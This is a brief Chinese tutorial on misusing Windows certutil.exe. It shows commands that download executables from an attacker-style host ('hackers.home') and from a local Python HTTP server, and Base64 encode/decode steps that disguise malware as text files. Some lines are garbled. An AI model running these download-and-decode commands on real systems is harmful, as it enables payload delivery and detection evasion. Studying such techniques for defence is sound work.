一、Certutil 介绍
Windows有一个名为CertUtil的内置程序,可用于在Windows中管理证书。使用此程序可以在Windows中安装,备份,删除,管理和执行与证书和证书存储相关的各种功能。
CertUtil的一个特性是能够从远程URL下载证书或任何其他文件,因为certutil是windows自带的exe。
使用语法 :
"certutil.exe -urlcache -split -f https://hackers.home/content.txt ... exe office365.exe
- C:\Users\12345\Desktop>123.exe -python -m http.server 8000
- C:\Users\12345\Desktop>python -m http.server 8000
- certutil -urlcache -split -f http://192.168.206.130:8000/123.exe
Certutil 包含一个编码参数(编码),这有助于在 Base64 中编码文件的内容。可以使用 certutil 对可执行文件举行编码,然后传输编码后的数据,在接收机上对其举行解码。
常用与sql注入,对恣意文件举行Base64编码,使恶意代码样本看起来像是无害的文本文件,然后使用CertUtil.exe下载后对其举行解码。下载了文本文件使用“Certutil.exe -decode”下令将Base64编码文件解码为可执行文件。- 将123.exe编码为123.txt
- C:\Users\12345\Desktop>certutil.exe -encode 123.exe 123.txt
- 将123.txt解码为123.exe
- C:\Users\12345\Desktop>certutil.exe -decode 123.txt 123.exe
https://mrwq.github.io/aggregate-paper/butian/certutil详解/
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。 |
